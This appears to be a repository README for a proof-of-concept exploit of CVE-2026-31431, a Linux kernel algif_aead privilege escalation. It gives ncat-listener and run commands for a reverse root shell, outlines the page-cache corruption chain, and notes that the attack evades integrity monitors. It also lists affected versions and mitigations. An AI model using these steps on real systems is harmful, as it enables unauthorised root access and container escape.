Copy Fail is a high-severity local privilege escalation (LPE) vulnerability in the Linux kernel's cryptographic subsystem (algif_aead). Discovered and disclosed by Theori (via their Xint Code AI-assisted vulnerability research tool) on April 29, 2026, the flaw allows any unprivileged local user to write 4 controlled bytes into the page cache of any readable file — and leverage that to obtain root on virtually every major Linux distribution shipped since 2017.
A working proof-of-concept exploit is only ~732 bytes of Python.
- Start Ncat Listener
sudo ncat -lvnp PORT
- Execute the exploit on target machine
# Using Python script
python3 CVE-2026-31431-Exploit.py IP PORT
# Compiled binary
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT
| Field | Detail |
|---|---|
| CVE ID | CVE-2026-31431 |
| CVSS Score | 7.8 (HIGH) |
| Type | Local Privilege Escalation (LPE) |
| Component | algif_aead — Linux kernel AF_ALG userspace crypto interface |
| Root Cause | Logic flaw in the authencesn AEAD template; an in-place optimization (commit 72548b093ee3, Aug 2017) causes page-cache pages to appear in the kernel's writable destination scatterlist |
| Primitive | 4-byte controlled write into the page cache of any readable file |
| Exploit Mechanism | AF_ALG socket → splice() → page-cache corruption of a setuid binary → root |
| Race Condition? | ❌ None — straight-line logic flaw, 100% reliable |
| Kernel Offset Needed? | ❌ No |
| Fix Commit | fafe0fa2995a (reverts the 2017 optimization) |
- Open an
AF_ALGsocket and bind toauthencesn(hmac(sha256),cbc(aes)) - Splice a readable setuid binary's pages into the socket
- The kernel's AEAD scratch write overwrites 4 bytes in the page cache of that binary
- Execute the now-corrupted setuid binary → root shell
- No race window — deterministic, works every time
- No kernel offset / KASLR bypass needed
- Same exploit works across distros — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky, etc.
- Container escape — the page cache is shared; a write from inside a container affects the host
- No disk modification — file-integrity monitors (AIDE, OSSEC, etc.) won't detect it
- No forensic trace on disk
| Affected | Not Affected |
|---|---|
| Linux kernel 4.14 through 7.0-rc | Kernels prior to 4.14 (before Aug 2017 commit) |
| All 6.18.x prior to 6.18.22 | 6.18.22+ (patched) |
| All 6.19.x prior to 6.19.12 | 6.19.12+ (patched) |
- Ubuntu 24.04 LTS
- Amazon Linux 2023
- RHEL 10.1
- SUSE 16
- Rocky Linux 9.7
Essentially every major Linux distribution released since 2017 is affected.
Update your kernel to a version containing fix commit fafe0fa2995a. Most major distributions have released or are releasing updated kernel packages.
If you cannot patch immediately:
- Block AF_ALG socket creation via seccomp policy
- Blacklist the
algif_aeadmodule:echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf sudo modprobe -r algif_aead 2>/dev/null
This repository is for educational and defensive purposes only. The information here is intended to help security teams understand, detect, and mitigate CVE-2026-31431. Always follow responsible disclosure practices and applicable laws.